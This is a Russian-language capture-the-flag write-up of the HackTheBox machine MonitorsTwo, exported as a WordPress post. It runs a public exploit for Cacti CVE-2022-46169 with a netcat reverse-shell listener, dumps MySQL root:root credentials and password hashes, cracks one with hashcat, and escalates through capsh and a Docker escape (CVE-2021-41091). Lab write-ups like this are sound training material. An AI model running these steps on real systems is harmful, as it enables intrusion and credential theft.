{"id":602,"date":"2023-09-13T17:04:01","date_gmt":"2023-09-13T14:04:01","guid":{"rendered":"https:\/\/seq.team\/?p=602"},"modified":"2025-12-02T15:15:58","modified_gmt":"2025-12-02T12:15:58","slug":"writeup-hackthebox-monitorstwo","status":"publish","type":"post","link":"https:\/\/seq.team\/en\/blog\/writeup-hackthebox-monitorstwo\/","title":{"rendered":"\u0420\u0430\u0437\u0431\u043e\u0440 HackTheBox – MonitorsTwo (Easy)"},"content":{"rendered":"\n
\n
\n
\u0421\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u044c:<\/td>Easy<\/td><\/tr>
\u041e\u0421:<\/td>Linux<\/td><\/tr>
\u0411\u0430\u043b\u043b\u044b:<\/td>30<\/td><\/tr>
IP:<\/td>10.10.11.211<\/td><\/tr>
\u0422\u0435\u0433\u0438:<\/td>Code Review, Docker Escape, Linux PrivEsc, CVE-2022-46169, CVE-2021-41091<\/td><\/tr><\/tbody><\/table><\/figure>\n<\/div>\n<\/div>\n\n\n\n

\u041a\u0440\u0430\u0442\u043a\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u044f<\/h3>\n\n\n\n

\u041f\u043e\u0441\u043b\u0435 \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0439 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u043c \u0447\u0442\u043e \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0438\u0441 Cacti 1.2.22<\/code> \u0443\u044f\u0437\u0432\u0438\u043c \u043a RCE. \u0414\u0430\u043b\u0435\u0435, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0434\u043e\u0441\u0442\u0443\u043f \u043a Docker-\u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0443 \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u0441 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u044c\u044e www-data<\/code>. \u0412 \u0441\u043a\u0440\u0438\u043f\u0442\u0435, \u0445\u0440\u0430\u043d\u044f\u0449\u0438\u043c\u0441\u044f \u0432\u043d\u0443\u0442\u0440\u0438 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043c \u0423\u0417 \u0421\u0423\u0411\u0414 MySQL. \u0412 \u0431\u0430\u0437\u0435 cacti<\/code> \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u0441\u044f \u0441\u043b\u0430\u0431\u044b\u0439 \u0445\u044d\u0448 \u043f\u0430\u0440\u043e\u043b\u044f \u043e\u0442 \u0423\u0417 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u044b \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f marcus<\/code>, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0443\u044f\u0437\u0432\u0438\u043c \u043a \u0430\u0442\u0430\u043a\u0435 \u043f\u043e\u043b\u043d\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u0431\u043e\u0440\u0430 \u043f\u043e \u0441\u043b\u043e\u0432\u0430\u0440\u044e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0445 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 rockyou<\/code> \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0444\u043b\u0430\u0433 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f marcus<\/code>. \u0412\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0432\u0448\u0438\u0441\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e CVE-2021-41091 \u043e\u0442\u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u043f\u0440\u0430\u0432\u0430 \u0431\u0438\u043d\u0430\u0440\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 \/bin\/bash \u0442\u0430\u043a, \u0447\u0442\u043e \u043e\u043d \u0441\u0442\u0430\u043b \u043e\u0431\u043b\u0430\u0434\u0430\u0442\u044c \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c\u0438 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u043d\u0430 \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f root<\/code> \u043e\u0442 \u043b\u0438\u0446\u0430 \u043b\u044e\u0431\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0432\u043d\u0435 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430 \u0438 \u0442\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0444\u043b\u0430\u0433 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f root<\/code>.<\/p>\n\n\n\n

\u0424\u0430\u0437\u0430 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438<\/h3>\n\n\n\n

\u041f\u0440\u043e\u0432\u0435\u0434\u0451\u043c \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0435 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0446\u0435\u043b\u0438: <\/p>\n\n\n\n

\n

nmap -sS -p- 10.10.11.211<\/p>\n<\/blockquote>\n\n\n

\nPORT STATE SERVICE\n22\/tcp open ssh\n80\/tcp open http\n<\/pre><\/div>\n\n\n
\u041f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u043c \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e: nmap -sVC -O -p22,80 10.10.11.211<\/code><\/p>\n\n\n
\n22\/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)\n|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)\n|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)\n80\/tcp open  http    nginx 1.18.0 (Ubuntu)\n|_http-title: Login to Cacti\n|_http-server-header: nginx\/1.18.0 (Ubuntu)\n<\/pre><\/div>\n\n\n
\u041f\u0435\u0440\u0435\u0439\u0434\u0451\u043c \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u043f\u043e IP \u0430\u0434\u0440\u0435\u0441\u0443 \u043c\u0430\u0448\u0438\u043d\u044b \u0438 \u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0438\u0441\u0430 \u043d\u0430 80 \u043f\u043e\u0440\u0442\u0443:<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0435 \u041f\u041e Cacti 1.2.22 \u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430<\/h3>\n\n\n\n
\u041d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 \u0444\u0438\u0433\u0443\u0440\u0438\u0440\u0443\u0435\u0442 \u043d\u0435\u043a\u043e\u0435 \u041f\u041e \u0434\u043b\u044f \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433\u0430 \u0438 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0441\u0435\u0442\u0438 Cacti<\/code><\/strong> \u0432\u0435\u0440\u0441\u0438\u0438 1.2.22<\/code><\/strong>. \u041f\u0435\u0440\u0435\u0434 \u0432\u044b\u0431\u043e\u0440\u043e\u043c \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0433\u043e \u043f\u0443\u0442\u0438 \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f \u0430\u0442\u0430\u043a\u0438 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0438\u043c \u043f\u043e\u0438\u0441\u043a \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0438 \u0433\u043e\u0442\u043e\u0432\u044b\u0445 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u043e\u0432 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u0442\u0438\u043b\u0438\u0442\u044b searchsploit<\/code>: <\/p>\n\n\n
\nsearchsploit cacti 1.2.22 -v\n<\/pre><\/div>\n\n
\n
\"\"<\/figure><\/div>\n\n\n
\u0412\u044b\u044f\u0441\u043d\u0438\u043b\u0438, \u0447\u0442\u043e \u044d\u0442\u043e \u041f\u041e \u0443\u044f\u0437\u0432\u0438\u043c\u043e \u043a CVE-2022-46169, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043e\u0431\u0440\u0430\u0442\u043d\u044b\u0439 \u0448\u0435\u043b\u043b. \u0413\u043e\u0442\u043e\u0432\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u0434\u043b\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f; \u0441\u043a\u043e\u043f\u0438\u0440\u0443\u0435\u043c \u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0443\u0435\u043c \u0434\u043e\u0441\u0442\u0443\u043f \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u0443\u044e \u043c\u0430\u0448\u0438\u043d\u0443:<\/p>\n\n\n
\nsearchsploit -m 51166\nnc -nvlp 7331\npython 51166.py -u http:\/\/10.10.11.211\/ -i yourIP -p 7331\n<\/pre><\/div>\n\n
\n
\"\"<\/figure><\/div>\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0434\u043e\u0441\u0442\u0443\u043f \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u0443\u044e \u043c\u0430\u0448\u0438\u043d\u0443 \u043e\u0442 \u043b\u0438\u0446\u0430 \u0441\u0435\u0440\u0432\u0438\u0441\u043d\u043e\u0439 \u0423\u0417 www-data<\/code>.<\/p>\n\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0423\u0417 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f<\/h3>\n\n\n\n
\u041e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0438\u043c \u043f\u043e\u0438\u0441\u043a \u0431\u0438\u043d\u0430\u0440\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0441 SUID \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u043e\u0434\u043d\u0438\u043c \u0438 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u0432:<\/p>\n\n\n
\nsudo -l\nfind \/ -user root -perm -4000 -print 2>\/dev\/null\nfind \/ -user root -perm -u=s -type f 2>\/dev\/null\n<\/pre><\/div>\n\n\n
\u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u0442\u0430\u043a\u043e\u0439 \u0432\u044b\u0432\u043e\u0434:<\/p>\n\n\n
\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n\/usr\/bin\/chsh\n\/usr\/bin\/chfn\n\/usr\/bin\/newgrp\n\/sbin\/capsh\n\/bin\/mount\n\/bin\/umount\n\/bin\/su\n<\/pre><\/div>\n\n\n
\u041e\u0434\u0438\u043d \u0438\u0437 \u0431\u0438\u043d\u0430\u0440\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \/sbin\/capsh<\/code> \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043d\u0435\u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u043e. \u0422\u0430\u043a\u0436\u0435, \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0447\u0442\u043e \u0437\u0430 \u0444\u0430\u0439\u043b\u044b \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0432 \u043a\u043e\u0440\u043d\u0435\u0432\u043e\u0439 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e ls -la<\/code>:<\/p>\n\n\n
\ndrwxr-xr-x   1 root root 4096 Mar 21 10:49 .\ndrwxr-xr-x   1 root root 4096 Mar 21 10:49 ..\n-rwxr-xr-x   1 root root    0 Mar 21 10:49 .dockerenv\ndrwxr-xr-x   1 root root 4096 Mar 22 13:21 bin\ndrwxr-xr-x   2 root root 4096 Mar 22 13:21 boot\ndrwxr-xr-x   5 root root  340 Apr 29 22:40 dev\n-rw-r--r--   1 root root  648 Jan  5 11:37 entrypoint.sh\n<\/pre><\/div>\n\n\n
\u0412\u044b\u0432\u0435\u0434\u0435\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0444\u0430\u0439\u043b\u0430 entrypoint.sh<\/code>:<\/p>\n\n\n
\n#!\/bin\/bash\nset -ex\n\nwait-for-it db:3306 -t 300 -- echo "database is connected"\nif [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then\n    mysql --host=db --user=root --password=root cacti &lt; \/var\/www\/html\/cacti.sql\n    mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"\n    mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"\nfi\n\nchown www-data:www-data -R \/var\/www\/html\n# first arg is `-f` or `--some-option`\nif [ "${1#-}" != "$1" ]; then\n        set -- apache2-foreground "$@"\nfi\n\nexec "$@"\n<\/pre><\/div>\n\n\n
\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u0411\u0414 \u0438 \u0423\u0417 \u0421\u0423\u0411\u0414 MySQL: root:root<\/code><\/p>\n\n\n\n
\u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0432\u044b\u0432\u0435\u0434\u0435\u043c \u0441\u043f\u0438\u0441\u043e\u043a \u0442\u0430\u0431\u043b\u0438\u0446:<\/p>\n\n\n
\nmysql --host=db --user=root --password=root cacti -e "show tables;"\n<\/pre><\/div>\n\n\n
\u041f\u043e\u043b\u043d\u044b\u0439 \u0441\u043f\u0438\u0441\u043e\u043a \u0442\u0430\u0431\u043b\u0438\u0446 \u0432 \u0411\u0414 cacti:<\/p>\n\n\n
\nTables_in_cacti\naggregate_graph_templates\naggregate_graph_templates_graph\naggregate_graph_templates_item\naggregate_graphs\naggregate_graphs_graph_item\naggregate_graphs_items\nautomation_devices\nautomation_graph_rule_items\nautomation_graph_rules\nautomation_ips\nautomation_match_rule_items\nautomation_networks\nautomation_processes\nautomation_snmp\nautomation_snmp_items\nautomation_templates\nautomation_tree_rule_items\nautomation_tree_rules\n[...]\nuser_auth\n[...]\n<\/pre><\/div>\n\n\n
\u0412\u044b\u0432\u0435\u0434\u0435\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0442\u0430\u0431\u043b\u0438\u0446\u044b user_auth: <\/p>\n\n\n
\nmysql --host=db --user=root --password=root cacti -e "select * from user_auth;"\n<\/pre><\/div>\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0440\u044f\u0434 \u0437\u0430\u043f\u0438\u0441\u0435\u0439, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0445 \u0445\u044d\u0448\u0438\/\u043f\u0430\u0440\u043e\u043b\u0438 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u0423\u0417:<\/p>\n\n\n
\nid      username     password   [...]\n1       admin        $2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ\/iuqMft\/llx8utpR1hjC\n3       guest        43e9a4ab75570f5b\n4       marcus       $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW\/MhFYK4C\n<\/pre><\/div>\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0435 \u0445\u044d\u0448\u0438 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0445\u044d\u0448\u0430\u043c\u0438 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 \u0423\u0417 \u041e\u0421 Linux \u0432 \u0444\u043e\u0440\u043c\u0430\u0442\u0435 $2*$ (Blowfish). \u041e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0438\u043c \u043f\u0435\u0440\u0435\u0431\u043e\u0440 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u0442\u0438\u043b\u0438\u0442\u044b hashcat<\/code>: hashcat -m 3200 -a 0 hashes.txt \/usr\/share\/wordlists\/rockyou.txt<\/code><\/p>\n\n\n\n
\u0414\u043b\u044f \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u043f\u043e\u0434\u043e\u0431\u0440\u0430\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u044c, \u043d\u043e \u0434\u043b\u044f \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 marcus<\/code> \u0431\u044b\u043b \u043f\u043e\u0434\u043e\u0431\u0440\u0430\u043d \u043f\u0430\u0440\u043e\u043b\u044c funkymonkey<\/code>.<\/p>\n\n\n\n
\u041f\u043e\u043f\u044b\u0442\u0430\u0435\u043c\u0441\u044f \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u043f\u043e SSH \u0441 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u043c\u0438 \u0434\u0430\u043d\u043d\u044b\u043c\u0438 \u0423\u0417:<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0438 \u0435\u0433\u043e \u0444\u043b\u0430\u0433\u0443!<\/p>\n\n\n\n
\u041f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u0434\u043e root<\/h3>\n\n\n\n
\u041f\u0440\u0438 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 \u0441 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u044c\u044e marcus \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435 \u043e \u043d\u043e\u0432\u043e\u043c \u043f\u0438\u0441\u044c\u043c\u0435, \u0432\u044b\u0432\u0435\u0434\u0435\u043c \u0435\u0433\u043e \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435: cat \/var\/mail\/marcus<\/code><\/p>\n\n\n
\nFrom: administrator@monitorstwo.htb\nTo: all@monitorstwo.htb\nSubject: Security Bulletin - Three Vulnerabilities to be Aware Of\n\nDear all,\n\nWe would like to bring to your attention three vulnerabilities that have been recently discovered and should be addressed as soon as possible.\n\nCVE-2021-33033: This vulnerability affects the Linux kernel before 5.11.14 and is related to the CIPSO and CALIPSO refcounting for the DOI definitions. Attackers can exploit this use-after-free issue to write arbitrary values. Please update your kernel to version 5.11.14 or later to address this vulnerability.\n\nCVE-2020-25706: This cross-site scripting (XSS) vulnerability affects Cacti 1.2.13 and occurs due to improper escaping of error messages during template import previews in the xml_path field. This could allow an attacker to inject malicious code into the webpage, potentially resulting in the theft of sensitive data or session hijacking. Please upgrade to Cacti version 1.2.14 or later to address this vulnerability.\n\nCVE-2021-41091: This vulnerability affects Moby, an open-source project created by Docker for software containerization. Attackers could exploit this vulnerability by traversing directory contents and executing programs on the data directory with insufficiently restricted permissions. The bug has been fixed in Moby (Docker Engine) version 20.10.9, and users should update to this version as soon as possible. Please note that running containers should be stopped and restarted for the permissions to be fixed.\n\nWe encourage you to take the necessary steps to address these vulnerabilities promptly to avoid any potential security breaches. If you have any questions or concerns, please do not hesitate to contact our IT department.\n\nBest regards,\n\nAdministrator\nCISO\nMonitor Two\nSecurity Team\n<\/pre><\/div>\n\n\n
\u0420\u0430\u0437\u043e\u0431\u0440\u0430\u0432\u0448\u0438\u0441\u044c \u0432 \u0447\u0451\u043c \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u044e\u0442\u0441\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043e \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043d\u044f\u0442\u044c, \u0447\u0442\u043e \u043c\u043e\u0436\u043d\u043e \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e CVE-2021-41091 \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0431\u0438\u043d\u0430\u0440\u043d\u044b\u0439 \u0444\u0430\u0439\u043b bash \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 SUID. \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0432 \u0441\u0435\u0441\u0441\u0438\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f www-data, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u043e\u0439 \u0440\u0430\u043d\u0435\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443: capsh --gid=0 --uid=0 --<\/code><\/p>\n\n\n\n
\u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u0432\u043d\u0443\u0442\u0440\u0438 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430 \u0441 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435\u043c \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u043f\u0440\u0430\u0432\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f root<\/code>, \u0437\u0430\u0442\u0435\u043c \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u0432\u044b\u0434\u0430\u0442\u044c SUID \u043f\u0440\u0430\u0432\u0430 \u043d\u0430 \/bin\/bash \u0432\u043d\u0443\u0442\u0440\u0438 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430: chmod u+s \/bin\/bash<\/code><\/p>\n\n\n\n
\u0414\u0430\u043b\u0435\u0435, \u0432\u043d\u0443\u0442\u0440\u0438 \u0441\u0435\u0441\u0441\u0438\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f marcus \u043d\u0430\u0439\u0434\u0451\u043c \u0442\u043e\u0447\u043a\u0443 \u043c\u043e\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e df<\/code>:<\/p>\n\n\n
\nFilesystem     1K-blocks    Used Available Use% Mounted on\nudev             1966928       0   1966928   0% \/dev\ntmpfs             402608    1232    401376   1% \/run\n\/dev\/sda2        7054840 4451424   2513656  64% \/\ntmpfs            2013040       0   2013040   0% \/dev\/shm\ntmpfs               5120       0      5120   0% \/run\/lock\ntmpfs            2013040       0   2013040   0% \/sys\/fs\/cgroup\n[...]\noverlay          7054840 4451424   2513656  64% \/var\/lib\/docker\/overlay2\/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1\/merged\n<\/pre><\/div>\n\n\n
\u041f\u0435\u0440\u0435\u0439\u0434\u0451\u043c \u0432 \u044d\u0442\u0443 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044e \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u043c \/bin\/bash \u0441 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u044b\u043c\u0438 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u0438\u0437 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430:<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
\u041c\u044b \u0441\u043c\u043e\u0433\u043b\u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0444\u043b\u0430\u0433 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f root!<\/p>\n\n\n\n
\u0421\u0441\u044b\u043b\u043a\u0438:<\/h3>\n\n\n\n
https:\/\/github.com\/ariyaadinatha\/cacti-cve-2022-46169-exploit<\/a><\/p>\n\n\n\n
https:\/\/github.com\/UncleJ4ck\/CVE-2021-41091<\/a><\/p>\n\n\n\n
https:\/\/ihsansencan.github.io\/privilege-escalation\/linux\/binaries\/capsh.html<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
\u0421\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u044c: Easy \u041e\u0421: Linux \u0411\u0430\u043b\u043b\u044b: 30 IP: 10.10.11.211 \u0422\u0435\u0433\u0438: Code Review, Docker Escape, Linux PrivEsc, CVE-2022-46169, CVE-2021-41091 \u041a\u0440\u0430\u0442\u043a\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u041f\u043e\u0441\u043b\u0435 \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0439 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u043c \u0447\u0442\u043e \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0438\u0441 Cacti 1.2.22 \u0443\u044f\u0437\u0432\u0438\u043c \u043a RCE. \u0414\u0430\u043b\u0435\u0435, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0434\u043e\u0441\u0442\u0443\u043f \u043a Docker-\u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0443 \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u0441 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u044c\u044e www-data. \u0412 \u0441\u043a\u0440\u0438\u043f\u0442\u0435, 